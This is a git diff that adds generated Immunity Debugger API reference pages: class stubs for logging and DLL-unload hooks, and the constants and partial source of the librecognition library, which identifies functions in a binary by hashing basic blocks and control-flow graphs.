+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class STDCALLFastLogHook
+
+
+
+
+
+
+
+
+Class STDCALLFastLogHook source code
+
+FastLogHook --+
+ |
+ STDCALLFastLogHook
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Inherited from FastLogHook :
+ Clear Continue Hook Pause addFastLogHook get getAllLog getAllUniqueFunctions isHooked isPause logBaseDisplacement logDirectMemory logRegister setMem setRestore setTable unHook
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.UnloadDLLHook-class.html b/1.73/Documentation/Ref/Libs.libhook.UnloadDLLHook-class.html
new file mode 100755
index 0000000..b4c743c
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.UnloadDLLHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.UnloadDLLHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class UnloadDLLHook
+
+
+
+
+
+
+
+
+Class UnloadDLLHook source code
+
+Hook --+
+ |
+ UnloadDLLHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.librecognition-module.html b/1.73/Documentation/Ref/Libs.librecognition-module.html
new file mode 100755
index 0000000..95f12ce
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.librecognition-module.html
@@ -0,0 +1,927 @@
+
+
+
+
+ Libs.librecognition
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module librecognition
+
+
+
+
+
+
+
+
+Module librecognition source code
+(c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+ Library for function recognizing
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.2'
+
+
+
+
+
+ COUNT = 100
+
+
+
+
+
+
+ C_BAD = 240
+
+
+
+
+
+
+ C_CAL = 112
+
+
+
+
+
+
+ C_CMD = 0
+
+
+
+
+
+
+ C_FLG = 144
+
+
+
+
+
+
+ C_FLT = 64
+
+
+
+
+
+
+ C_JMC = 96
+
+
+
+
+
+
+ C_JMP = 80
+
+
+
+
+
+
+ C_MMX = 48
+
+
+
+
+
+
+ C_NOW = 224
+
+
+
+
+
+
+ C_POP = 32
+
+
+
+
+
+
+ C_PRI = 192
+
+
+
+
+
+
+ C_PSH = 16
+
+
+
+
+
+
+ C_REP = 176
+
+
+
+
+
+
+ C_RET = 128
+
+
+
+
+
+
+ C_RTF = 160
+
+
+
+
+
+
+ C_SSE = 208
+
+
+
+
+
+
+ C_TYPEMASK = 240
+
+
+
+
+
+
+ DATA_PTR = 2
+
+
+
+
+
+
+ DECR_3DNOW = 45
+
+
+
+
+
+
+ DECR_BYTE = 33
+
+
+
+
+
+
+ DECR_DWORD = 36
+
+
+
+
+
+
+ DECR_FLOAT10 = 41
+
+
+
+
+
+
+ DECR_ISREG = 32
+
+
+
+
+
+
+ DECR_QWORD = 40
+
+
+
+
+
+
+ DECR_SEG = 42
+
+
+
+
+
+
+ DECR_SSE = 46
+
+
+
+
+
+
+ DECR_TYPEMASK = 63
+
+
+
+
+
+
+ DECR_WORD = 34
+
+
+
+
+
+
+ DEC_3DNOW = 13
+
+
+
+
+
+
+ DEC_BYTE = 1
+
+
+
+
+
+
+ DEC_BYTESW = 17
+
+
+
+
+
+
+ DEC_CALLDEST = 31
+
+
+
+
+
+
+ DEC_CHECKED = 128
+
+
+
+
+
+
+ DEC_COMMAND = 29
+
+
+
+
+
+
+ DEC_CONST = 64
+
+
+
+
+
+
+ DEC_DWORD = 4
+
+
+
+
+
+
+ DEC_FLOAT10 = 9
+
+
+
+
+
+
+ DEC_FLOAT4 = 5
+
+
+
+
+
+
+ DEC_FLOAT8 = 7
+
+
+
+
+
+
+ DEC_FWORD = 6
+
+
+
+
+
+
+ DEC_JMPDEST = 30
+
+
+
+
+
+
+ DEC_NEXTCODE = 19
+
+
+
+
+
+
+ DEC_NEXTDATA = 3
+
+
+
+
+
+
+ DEC_PBODY = 64
+
+
+
+
+
+
+ DEC_PEND = 96
+
+
+
+
+
+
+ DEC_PROC = 32
+
+
+
+
+
+
+ DEC_PROCMASK = 96
+
+
+
+
+
+
+ DEC_QWORD = 8
+
+
+
+
+
+
+ DEC_SIGNED = 256
+
+
+
+
+
+
+ DEC_SSE = 14
+
+
+
+
+
+
+ DEC_STRING = 11
+
+
+
+
+
+
+ DEC_TBYTE = 10
+
+
+
+
+
+
+ DEC_TEXT = 16
+
+
+
+
+
+
+ DEC_TYPEMASK = 31
+
+
+
+
+
+
+ DEC_UNICODE = 12
+
+
+
+
+
+
+ DEC_UNKNOWN = 0
+
+
+
+
+
+
+ DEC_WORD = 2
+
+
+
+
+
+
+ DIACRITICAL = 2
+
+
+
+
+
+
+ DISASM_ALL = 5
+
+
+
+
+
+
+ DISASM_CODE = 4
+
+
+
+
+
+
+ DISASM_DATA = 1
+
+
+
+
+
+
+ DISASM_FILE = 3
+
+
+
+
+
+
+ DISASM_RTRACE = 6
+
+
+
+
+
+
+ DISASM_SIZE = 0
+
+
+
+
+
+
+ DISASM_TRACE = 2
+
+
+
+
+
+
+ DOUBLEL = 4
+
+
+
+
+
+
+ DWORD = 2
+
+
+
+
+
+
+ FUNCTION_PTR = 1
+
+
+
+
+
+
+ INT = 0
+
+
+
+
+
+
+ MEM = 1
+
+
+
+
+
+
+ MEM_ADDR = 3
+
+
+
+
+
+
+ PLAINASCII = 1
+
+
+
+
+
+
+ POINTER = 3
+
+
+
+
+
+
+ PTR = 0
+
+
+
+
+
+
+ RAREASCII = 16
+
+
+
+
+
+
+ RST_INDIRECT = 3
+
+
+
+
+
+
+ RST_INVALID = 0
+
+
+
+
+
+
+ RST_VALUE = 1
+
+
+
+
+
+
+ RST_VFIXUP = 2
+
+
+
+
+
+
+ RegisterName = {(0, 0, 0, 0, 0, 0, 0, 0): '', (0, 0, 0, 0, 0, ...
+
+
+
+
+
+ Registers16BitsOrder = ['AX', 'CX', 'DX', 'BX', 'SP', 'BP', 'S...
+
+
+
+
+
+ Registers32BitsOrder = ['EAX', 'ECX', 'EDX', 'EBX', 'ESP', 'EB...
+
+
+
+
+
+ Registers8BitsOrder = ['AL', 'CL', 'DL', 'BL', 'AH', 'CH', 'DH...
+
+
+
+
+
+ STACK_PTR = 3
+
+
+
+
+
+
+ STRING = 1
+
+
+
+
+
+
+ UNICODE = 2
+
+
+
+
+
+
+ ctable = [0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 19, 0, 0, 19, 0, 0, 0...
+
+
+
+
+
+
+ RegisterName
+
+
+
+
+ Value:
+
+{(0, 0, 0, 0, 0, 0, 0, 0): '',
+ (0, 0, 0, 0, 0, 0, 0, 1): 'EDI',
+ (0, 0, 0, 0, 0, 0, 1, 0): 'ESI',
+ (0, 0, 0, 0, 0, 1, 0, 0): 'EBP',
+ (0, 0, 0, 0, 1, 0, 0, 0): 'ESP',
+ (0, 0, 0, 1, 0, 0, 0, 0): 'EBX',
+ (0, 0, 1, 0, 0, 0, 0, 0): 'EDX',
+ (0, 1, 0, 0, 0, 0, 0, 0): 'ECX',
+...
+
+
+
+
+
+
+ Registers16BitsOrder
+
+
+
+
+ Value:
+
+['AX', 'CX', 'DX', 'BX', 'SP', 'BP', 'SI', 'DI']
+
+
+
+
+
+
+ Registers32BitsOrder
+
+
+
+
+ Value:
+
+['EAX', 'ECX', 'EDX', 'EBX', 'ESP', 'EBP', 'ESI', 'EDI']
+
+
+
+
+
+
+ Registers8BitsOrder
+
+
+
+
+ Value:
+
+['AL', 'CL', 'DL', 'BL', 'AH', 'CH', 'DH', 'BH']
+
+
+
+
+
+
+ ctable
+
+
+
+
+ Value:
+
+[0,
+ 0,
+ 0,
+ 0,
+ 0,
+ 0,
+ 0,
+ 0,
+...
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.librecognition-pysrc.html b/1.73/Documentation/Ref/Libs.librecognition-pysrc.html
new file mode 100755
index 0000000..c988629
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.librecognition-pysrc.html
@@ -0,0 +1,965 @@
+
+
+
+
+ Libs.librecognition
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module librecognition
+
+
+
+
+
+
+
+
+
+ 1 """ 2 (c) Immunity, Inc. 2004-2007 3 4 5 U{Immunity Inc.<http://www.immunityinc.com>} 6 7 8 Library for function recognizing 9 10 """ 11 __VERSION__ = '1.2' 12
+ 13
+ 14 from libanalyze import * 15 from libdatatype import * 16 from libstackanalyze import * 17 import binascii 18 import struct 19 import hashlib 20 import re 21 import string 22 import debugger 23 import csv 24 import os 25
+
28 if not isinstance ( dictionaries , list ) :
+
29 dictionaries = [ dictionaries ]
+
30
+
31 self . iterators = [ ]
+
32 self . fds = [ ]
+
33 self . idx = 0
+
34 for d in dictionaries :
+
35 try :
+
36 fd = open ( d , "rb" )
+
37 except :
+
38 fd = open ( d , "w+b" )
+
39 self . iterators . append ( csv . reader ( fd ) )
+
40 self . fds . append ( fd )
+
42 for i in range ( 0 , self . idx + 1 ) :
+
43 self . fds [ i ] . seek ( 0 )
+
44 self . idx = 0
+
45 return self
+
46
+
48 while self . iterators :
+
49 self . iterators . pop ( )
+
50 for fd in self . fds :
+
51 fd . close ( )
+
52 del self . fds
+
53
+
55 try :
+
56 data = self . iterators [ self . idx ] . next ( )
+
57 except StopIteration :
+
58 if len ( self . iterators ) > self . idx + 1 :
+
59 self . idx += 1
+
60 return self . next ( )
+
61 else :
+
62 raise StopIteration
+
63
+
64 data . append ( self . fds [ self . idx ] . name )
+
65 return data
+
66
+
68 - def __init__ ( self , imm , dictionaryfiles = None ) :
+
69 """
+
70 This class try to recognize a function using different methods
+
71 (address/signature/heuristic).
+
72
+
73 @type imm: Debbuger OBJECT
+
74 @param imm: Debbuger instance
+
75
+
76 @type dictionaryfiles: STRING|LIST
+
77 @param dictionaryfiles: Name, or list of names, of .dat files inside the Data folder, where're stored the function
+
78 patterns. Use an empty string to use all .dat files in Data folder.
+
79 """
+
80 self . imm = imm
+
81 self . heuristicReferencesCache = { }
+
82 self . heuristicCache = { }
+
83 self . resolvCache = { }
+
84
+
85 if not dictionaryfiles :
+
86 dictionaryfiles = [ ]
+
87 for file in os . listdir ( "Data" ) :
+
88 if file [ - 4 : ] == ".dat" :
+
89 dictionaryfiles . append ( os . path . join ( "Data" , file ) )
+
90 self . dictionaries = MultiCSVIterator ( dictionaryfiles )
+
91
+
93 """
+
94 Look up into our dictionaries to find a function match.
+
95
+
96 @type address: DWORD
+
97 @param address: Address of the function to search
+
98
+
99 @type heuristic: INTEGER
+
100 @param heuristic: heuristic threasold to consider a real function match
+
101
+
102 @rtype: STRING
+
103 @return: a STRING with the function's real name or the given address if there's no match
+
104 """
+
105
+
106
+
107 if self . resolvCache . has_key ( address ) :
+
108 return self . resolvCache [ address ]
+
109
+
110
+
111 exact = self . makeFunctionHashExact ( address )
+
112 for data in self . dictionaries :
+
113 if exact == data [ 4 ] :
+
114 self . resolvCache [ address ] = data [ 0 ]
+
115 break
+
116
+
117
+
118 if not self . resolvCache . has_key ( address ) :
+
119 ref = self . selectBasicBlock ( address )
+
120 posThreshold = 0
+
121 posName = ""
+
122 for data in self . dictionaries :
+
123
+
124
+
125 if ref == data [ 1 ] :
+
126 perc = self . checkHeuristic ( address , data [ 2 ] , data [ 3 ] )
+
127
+
128 if perc >= heuristic and perc > posThreshold :
+
129 posThreshold = perc
+
130 posName = data [ 0 ]
+
131 if posName :
+
132 self . resolvCache [ address ] = posName
+
133
+
134
+
135 if not self . resolvCache . has_key ( address ) :
+
136 self . resolvCache [ address ] = "%08X" % address
+
137
+
138 return self . resolvCache [ address ]
+
139
+
141 """
+
142 Check a given address with a precomputed hash of a function.
+
143 Return a percentage of match (you can use a threasold to consider a real match)
+
144
+
145 @type address: DWORD
+
146 @param address: Address of the function to compare
+
147
+
148 @type reference: STRING
+
149 @param reference: base64 representation of the compressed information about the function
+
150
+
151 @type refFirstCall: STRING
+
152 @param refFirstCall: the same, but following the function pointed by the first call in the first BB.
+
153 (OPTIONAL)
+
154
+
155 @rtype: INTEGER
+
156 @return: heuristic threasold to consider a real function match
+
157 """
+
158
+
159
+
160
+
161
+
162 if self . heuristicCache . has_key ( address ) :
+
163 cfg = self . heuristicCache [ address ]
+
164 else :
+
165 cfg = self . makeFunctionHashHeuristic ( address )
+
166 self . heuristicCache [ address ] = cfg
+
167
+
168
+
169 sha1 = hashlib . sha1 ( reference + refFirstCall ) . digest ( )
+
170 if self . heuristicReferencesCache . has_key ( sha1 ) :
+
171 refcfg = self . heuristicReferencesCache [ sha1 ]
+
172 else :
+
173
+
174
+
175 refcfg = [ ]
+
176 refcfg . append ( [ ] )
+
177 refcfg . append ( [ ] )
+
178 data = binascii . a2b_base64 ( reference )
+
179 for o in range ( 0 , len ( data ) , 12 ) :
+
180 ( start , left , right ) = struct . unpack ( "LLL" , data [ o : o + 12 ] )
+
181 refcfg [ 0 ] . append ( [ start , left , right ] )
+
182 if refFirstCall :
+
183 data = binascii . a2b_base64 ( refFirstCall )
+
184 for o in range ( 0 , len ( data ) , 12 ) :
+
185 ( start , left , right ) = struct . unpack ( "LLL" , data [ o : o + 12 ] )
+
186 refcfg [ 1 ] . append ( [ start , left , right ] )
+
187 self . heuristicReferencesCache [ sha1 ] = refcfg
+
188
+
189 perc1 = self . compareHeuristic ( cfg [ 0 ] [ : ] , refcfg [ 0 ] [ : ] )
+
190 if cfg [ 1 ] or refcfg [ 1 ] :
+
191 perc2 = self . compareHeuristic ( cfg [ 1 ] [ : ] , refcfg [ 1 ] [ : ] )
+
192
+
193 perc = ( perc1 + perc2 ) / 2
+
194 else :
+
195 perc = perc1
+
196
+
197 return perc
+
198
+
200
+
201
+
202
+
203
+
204
+
205
+
206 diff = eq = 0
+
207 checked = [ ]
+
208
+
209 for info in cfg :
+
210 bbeq = value = 0
+
211 for rinfo in refcfg :
+
212 tmp = 0
+
213 if info [ 0 ] == rinfo [ 0 ] : tmp += 1
+
214 if info [ 1 ] == rinfo [ 1 ] : tmp += 1
+
215 if info [ 2 ] == rinfo [ 2 ] : tmp += 1
+
216 if tmp > bbeq :
+
217 bbeq = tmp
+
218 value = rinfo
+
219 if bbeq == 3 : break
+
220 try :
+
221 idx = refcfg . index ( value )
+
222 refcfg . pop ( idx )
+
223 except ValueError :
+
224 pass
+
225
+
226 eq += bbeq
+
227 diff += 3 - bbeq
+
228
+
229
+
230 for rinfo in refcfg :
+
231 bbeq = value = 0
+
232 for info in cfg :
+
233 tmp = 0
+
234 if info [ 0 ] == rinfo [ 0 ] : tmp += 1
+
235 if info [ 1 ] == rinfo [ 1 ] : tmp += 1
+
236 if info [ 2 ] == rinfo [ 2 ] : tmp += 1
+
237 if tmp > bbeq :
+
238 bbeq = tmp
+
239 value = rinfo
+
240 if bbeq == 3 : break
+
241 try :
+
242 idx = cfg . index ( value )
+
243 cfg . pop ( idx )
+
244 except ValueError :
+
245 pass
+
246
+
247 eq += bbeq
+
248 diff += 3 - bbeq
+
249
+
250
+
251 return eq * 100 / ( eq + diff )
+
252
+
254 """
+
255 Consider:
+
256 - Control Flow Graph
+
257 - generalized instructions that:
+
258 access memory/write memory/use registers/use constant/call/jmp/jmc
+
259 and all his combinations.
+
260 - special case of functions with just 1 BB and a couple of calls (follow the first call)
+
261
+
262 @type address: DWORD
+
263 @param address: address of the function to hash
+
264
+
265 @type compressed: Boolean
+
266 @param compressed: return a compressed base64 representation or the raw data
+
267
+
268 @type followCalls: Boolean
+
269 @param followCalls: follow the first call in a single basic block function
+
270
+
271 @rtype: LIST
+
272 @return: the first element is described below and the second is the result of this same function but over the first
+
273 call of a single basic block function (if applies), each element is like this:
+
274 a base64 representation of the compressed version of each bb hash:
+
275 [4 bytes BB(i) start][4 bytes BB(i) 1st edge][4 bytes BB(i) 2nd edge]
+
276 0 <= i < BB count
+
277 or the same but like a LIST with raw data.
+
278 """
+
279
+
280 f = self . imm . getFunction ( address )
+
281 bbs = f . getBasicBlocks ( )
+
282 bbmap = { }
+
283 cfg = { }
+
284
+
285
+
286 for bb in bbs :
+
287 cfg [ bb . getStart ( ) ] = bb . getEdges ( )
+
288
+
289
+
290 for bb in bbs :
+
291 bbhash_data = [ ]
+
292 for op in bb . getInstructions ( self . imm ) :
+
293
+
294 instr = [ ]
+
295 instr . append ( op . getMemType ( ) )
+
296 instr . append ( op . indexed )
+
297 instr . append ( op . getCmdType ( ) )
+
298 instr . append ( op . optype [ 0 ] )
+
299 instr . append ( op . optype [ 1 ] )
+
300 instr . append ( op . optype [ 2 ] )
+
301 instr . append ( op . getSize ( ) )
+
302 bbhash_data . append ( self . hash_a_list ( instr ) )
+
303 bbhash = self . hash_a_list ( bbhash_data )
+
304 bbmap [ bb . getStart ( ) ] = bbhash
+
305
+
306
+
307 rcfg = [ ]
+
308 for start , edges in cfg . iteritems ( ) :
+
309 rstart = 0
+
310 redges = [ 0 , 0 ]
+
311 rstart = bbmap [ start ]
+
312 if bbmap . has_key ( edges [ 0 ] ) :
+
313 redges [ 0 ] = bbmap [ edges [ 0 ] ]
+
314 if bbmap . has_key ( edges [ 1 ] ) :
+
315 redges [ 1 ] = bbmap [ edges [ 1 ] ]
+
316 rcfg . append ( [ rstart , redges [ 0 ] , redges [ 1 ] ] )
+
317
+
318
+
319 firstcall = [ ]
+
320 if followCalls and len ( bbs ) == 1 and len ( bbs [ 0 ] . getCalls ( ) ) > 0 :
+
321
+
322
+
323 op = self . imm . Disasm ( bbs [ 0 ] . getCalls ( ) [ 0 ] )
+
324 if op . getJmpConst ( ) :
+
325 firstcall = self . makeFunctionHashHeuristic ( op . getJmpConst ( ) , compressed , followCalls = False ) [ 0 ]
+
326
+
327 del op
+
328
+
329 del bbs
+
330 del f
+
331 rcfg . sort ( )
+
332
+
333 if compressed :
+
334
+
335 fhash = ""
+
336 for data in rcfg :
+
337
+
338 fhash += struct . pack ( "LLL" , data [ 0 ] , data [ 1 ] , data [ 2 ] )
+
339 return [ binascii . b2a_base64 ( fhash ) [ : - 1 ] , firstcall ]
+
340 else :
+
341 return [ rcfg , firstcall ]
+
342
+
344 """
+
345 Take a list and return a binary representation of his CRC32.
+
346
+
347 @type data: LIST
+
348 @param data: a list of elements to make the hash
+
349
+
350 @rtype: UNSIGNED LONG
+
351 @return: a hash of the given values
+
352 """
+
353
+
354 ret = 0
+
355 for elem in data :
+
356 ret = binascii . crc32 ( str ( elem ) , ret )
+
357 return struct . unpack ( "L" , struct . pack ( "l" , ret ) ) [ 0 ]
+
358
+
360 """
+
361 Search memory to find a function that fullfit the options.
+
362
+
363 @type csvline: STRING
+
364 @param csvline: A line of a Data CSV file. This's a simple support for copy 'n paste from a CSV file.
+
365
+
366 @type heuristic: INTEGER
+
367 @param heuristic: heuristic threasold to consider a real function match
+
368
+
369 @type module: STRING
+
370 @param module: name of a module to restrict the search
+
371
+
372 @rtype: LIST
+
373 @return: a list of tuples with possible function's addresses and the heauristic match percentage
+
374 """
+
375
+
376 line = csv . reader ( [ csvline ] ) . next ( )
+
377 if len ( line ) < 9 : line [ 7 ] = ""
+
378 return self . _searchFunctionByHeuristic ( line [ 1 ] , line [ 2 ] , line [ 3 ] , line [ 4 ] , heuristic , module , string . split ( line [ 7 ] , "|" ) )
+
379
+
380 - def _searchFunctionByHeuristic ( self , search , functionhash = None , firstcallhash = None , exact = None , heuristic = 90 , module = None , firstbb = None ) :
+
381 """
+
382 Search memory to find a function that fullfit the options.
+
383
+
384 @type search: STRING
+
385 @param search: searchCommand string to make the first selection
+
386
+
387 @type functionhash: STRING
+
388 @param functionhash: the primary function hash (use makeFunctionHash to generate this value)
+
389
+
390 @type firstcallhash: STRING
+
391 @param firstcallhash: the hash of the first call on single BB functions (use makeFunctionHash to generate this value)
+
392
+
393 @type exact: STRING
+
394 @param exact: an exact function hash, this's a binary byte-per-byte hash (use makeFunctionHash to generate this value)
+
395
+
396 @type heuristic: INTEGER
+
397 @param heuristic: heuristic threasold to consider a real function match
+
398
+
399 @type module: STRING
+
400 @param module: name of a module to restrict the search
+
401
+
402 @type firstbb: STRING
+
403 @param firstbb: generalized assembler of the first BB (to search function begin)
+
404
+
405 @rtype: LIST
+
406 @return: a list of tuples with possible function's addresses and the heauristic match percentage
+
407 """
+
408
+
409
+
410
+
411 if isinstance ( search , list ) :
+
412 search . reverse ( )
+
413 tmp = search [ : ]
+
414 if tmp : search = tmp . pop ( )
+
415 if tmp : functionhash = tmp . pop ( )
+
416 if tmp : firstcallhash = tmp . pop ( )
+
417 if tmp : exact = tmp . pop ( )
+
418 if tmp : version = tmp . pop ( )
+
419 if tmp : file = tmp . pop ( )
+
420 if tmp : firstbb = tmp . pop ( )
+
421
+
422
+
423 if not search or not functionhash :
+
424 return None
+
425
+
426 if not firstcallhash :
+
427 firstcallhash = ""
+
428
+
429 heu_addy = None
+
430 heu_perc = 0
+
431 poss_functions = [ ]
+
432 poss_return = [ ]
+
433 search = string . replace ( search , "\\n" , "\n" )
+
434 if search :
+
435 if module :
+
436
+
437 for key , mod in debugger . Getallmodules ( ) . iteritems ( ) :
+
438 if module . lower ( ) in key . lower ( ) :
+
439 poss_functions += self . imm . searchCommandsOnModule ( mod [ 0 ] , search )
+
440 else :
+
441 poss_functions = self . imm . searchCommands ( search )
+
442 if poss_functions :
+
443 for poss in poss_functions :
+
444
+
445 addy = self . imm . getFunctionBegin ( poss [ 0 ] )
+
446 if not addy :
+
447
+
448 for mod in self . imm . getAllModules ( ) . values ( ) :
+
449 if mod . getMainentry ( ) :
+
450
+
451 f = StackFunction ( self . imm , mod . getMainentry ( ) )
+
452 if f . isInsideFunction ( poss [ 0 ] ) :
+
453 addy = mod . getMainentry ( )
+
454 break
+
455 if not addy and firstbb :
+
456
+
457 addy = self . findBasicBlockHeuristically ( poss [ 0 ] , firstbb )
+
458 if not addy and firstbb :
+
459 tmp = self . findFirstBB ( poss [ 0 ] )
+
460 if tmp :
+
461
+
462 addy = self . findBasicBlockHeuristically ( tmp , firstbb )
+
463 if not addy :
+
464 addy = poss [ 0 ]
+
465
+
466
+
467
+
468 if exact :
+
469 test = self . makeFunctionHashExact ( addy )
+
470 if exact == test and not firstcallhash :
+
471
+
472
+
473 return [ ( addy , 100 ) ]
+
474
+
475 perc = self . checkHeuristic ( addy , functionhash , firstcallhash )
+
476
+
477 if perc >= heuristic :
+
478 poss_return . append ( ( addy , perc ) )
+
479
+
480 return poss_return
+
481
+
483 """
+
484 Look up into our dictionaries to find a function match.
+
485
+
486 @type name: STRING
+
487 @param name: Name of the function to search
+
488
+
489 @type module: STRING
+
490 @param module: name of a module to restrict the search
+
491
+
492 @type version: STRING
+
493 @param version: restrict the search to the given version
+
494
+
495 @type heuristic: INTEGER
+
496 @param heuristic: heuristic threasold to consider a real function match
+
497
+
498 @rtype: LIST
+
499 @return: a list of tuples with possible function's addresses and the heauristic match percentage
+
500 """
+
501
+
502 name = name . lower ( )
+
503
+
504
+
505 poss_return = [ ]
+
506 for data in self . dictionaries :
+
507 if name == data [ 0 ] . lower ( ) :
+
508
+
509 if version and version . lower ( ) != data [ 6 ] . lower ( ) :
+
510 continue
+
511
+
512
+
513 if len ( data ) < 9 : data [ 7 ] = ""
+
514 poss_return += self . _searchFunctionByHeuristic ( data [ 1 ] , data [ 2 ] , data [ 3 ] , data [ 4 ] , heuristic , module , string . split ( data [ 7 ] , "|" ) )
+
515 return poss_return
+
516
+
518 """
+
519 Return a SHA-1 hash of the function, taking the raw bytes as data.
+
520
+
521 @type address: DWORD
+
522 @param address: address of the function to hash
+
523
+
524 @rtype: STRING
+
525 @return: SHA-1 hash of the function
+
526 """
+
527
+
528 f = self . imm . getFunction ( address )
+
529 bbs = f . getBasicBlocks ( )
+
530 bucket = ""
+
531 data = { }
+
532
+
533 for bb in bbs :
+
534 data [ bb . getStart ( ) ] = self . imm . readMemory ( bb . getStart ( ) , bb . getSize ( ) )
+
535
+
536 keys = data . keys ( )
+
537 keys . sort ( )
+
538
+
539 for key in keys :
+
540 bucket += data [ key ]
+
541
+
542 hash = hashlib . sha1 ( bucket ) . hexdigest ( )
+
543 del bucket
+
544 del bbs
+
545 del f
+
546 return hash
+
547
+
549 """
+
550 Return a list with the best BB to use for a search and the heuristic hash
+
551 of the function. This two components are the function hash.
+
552
+
553 @type address: DWORD
+
554 @param address: address of the function to hash
+
555
+
556 @type compressed: Boolean
+
557 @param compressed: return a compressed base64 representation or the raw data
+
558
+
559 @rtype: LIST
+
560 @return: 1st element is the generalized instructions to use with searchCommand
+
561 2nd element is the heuristic function hash (makeFunctionHashHeuristic)
+
562 3rd element is an exact hash of the function (makeFunctionHashExact)
+
563 4th element is a LIST of generalized instructions of the first BB (to find the function begin)
+
564 """
+
565
+
566 ret = [ ]
+
567 ret . append ( self . selectBasicBlock ( address ) )
+
568 ret . append ( self . makeFunctionHashHeuristic ( address , compressed ) )
+
569 ret . append ( self . makeFunctionHashExact ( address ) )
+
570 ret . append ( self . generalizeFunction ( address ) [ 1 ] [ 1 ] )
+
571 return ret
+
572
+
574 bbs = self . generalizeFunction ( address )
+
575
+
576
+
577
+
578 hpoints = bb = 0
+
579 for id , instrs in bbs [ 1 ] . iteritems ( ) :
+
580 map = { }
+
581 sum = 0
+
582 for instr in instrs :
+
583 sum += 1
+
584 base = instr . split ( " " )
+
585 if "REP" in base [ 0 ] :
+
586 base = base [ 0 ] + " " + base [ 1 ]
+
587 else :
+
588 base = base [ 0 ]
+
589 map [ base ] = True
+
590 if sum > 7 : break
+
591
+
592
+
593
+
594 points = sum + len ( map ) * 4
+
595 if points > hpoints :
+
596
+
597
+
598 hpoints = points
+
599 bb = id
+
600 ret = ""
+
601 if bb :
+
602 ret = string . join ( bbs [ 1 ] [ bb ] [ 0 : 8 ] , "\\n" )
+
603 del bbs
+
604 return ret
+
605
+
607 """
+
608 Take an address an return a generalized version of the function, dismissing
+
609 address and register dependant information.
+
610
+
611 @type address: DWORD
+
612 @param address: address to the function begin
+
613
+
614 @rtype: LIST
+
615 @return: the 1st value is a DICTIONARY of a Control Flow Graph of the
+
616 BB conexions (each BB have an arbitrary ID)
+
617 the 2nd value is a DICTIONARY using this arbitrary BB ID as the key
+
618 and a LIST of searchCommand suitable, generalized instructions.
+
619 """
+
620 bbcount = 1
+
621 bbmap = { }
+
622 cfg = { }
+
623 bbinfo = { }
+
624
+
625 f = self . imm . getFunction ( address )
+
626 bbs = f . getBasicBlocks ( )
+
627
+
628
+
629 for bb in bbs :
+
630 if not bbmap . has_key ( bb . getStart ( ) ) :
+
631 bbmap [ bb . getStart ( ) ] = bbcount
+
632 bbcount += 1
+
633 if not bbmap . has_key ( bb . getEdges ( ) [ 0 ] ) :
+
634 bbmap [ bb . getEdges ( ) [ 0 ] ] = bbcount
+
635 bbcount += 1
+
636 if not bbmap . has_key ( bb . getEdges ( ) [ 1 ] ) :
+
637 bbmap [ bb . getEdges ( ) [ 1 ] ] = bbcount
+
638 bbcount += 1
+
639
+
640 cfg [ bbmap [ bb . getStart ( ) ] ] = [ bbmap [ bb . getEdges ( ) [ 0 ] ] , bbmap [ bb . getEdges ( ) [ 1 ] ] ]
+
641
+
642 regex = [ ]
+
643 for op in bb . getInstructions ( self . imm ) :
+
644 asm = self . generalizeInstruction ( op )
+
645 regex . append ( asm )
+
646
+
647 bbinfo [ bbmap [ bb . getStart ( ) ] ] = regex
+
648
+
649 del bbs
+
650 del f
+
651 del regex
+
652 return [ cfg , bbinfo ]
+
653
+
655 """
+
656 Generalize an instruction given an address or an opCode instance
+
657
+
658 @type inp: DWORD|OpCode OBJECT
+
659 @param inp: address to generalize or opcode to generalize
+
660
+
661 @rtype: STRING
+
662 @return: a generalized assembler instruction
+
663 """
+
664 if not isinstance ( inp , opCode ) :
+
665 op = self . imm . Disasm ( inp )
+
666 else : op = inp
+
667
+
668 asm = op . getDisasm ( )
+
669
+
670
+
671 if op . isConditionalJmp ( ) :
+
672 asm = "JCC CONST"
+
673 if op . getImmConst ( ) or op . operand [ 0 ] [ 0 ] == DEC_CONST :
+
674
+
675 r = re . compile ( "(?<=[ ,\[])[a-z0-9_\.\@\-]*%X" % op . getImmConst ( ) , re . I )
+
676 asm = r . sub ( 'CONST' , asm )
+
677 if op . getImmConst ( ) > 0xFFFFBFFF :
+
678
+
679 r = re . compile ( "(?<=[ ,\[])[a-z0-9_\.\@\-]*\%X" % ( op . getImmConst ( ) - 0x100000000 ) , re . I )
+
680 asm = r . sub ( 'CONST' , asm )
+
681 if op . getAddrConst ( ) :
+
682 if not op . indexed :
+
683 asm = asm . split ( "[" ) [ 0 ] + "[CONST]" + asm . split ( "]" ) [ 1 ]
+
684 else :
+
685 tmp = "%+X" % struct . unpack ( "l" , struct . pack ( "L" , op . getAddrConst ( ) ) )
+
686 asm = asm . replace ( tmp , "+CONST" )
+
687 if op . getJmpConst ( ) :
+
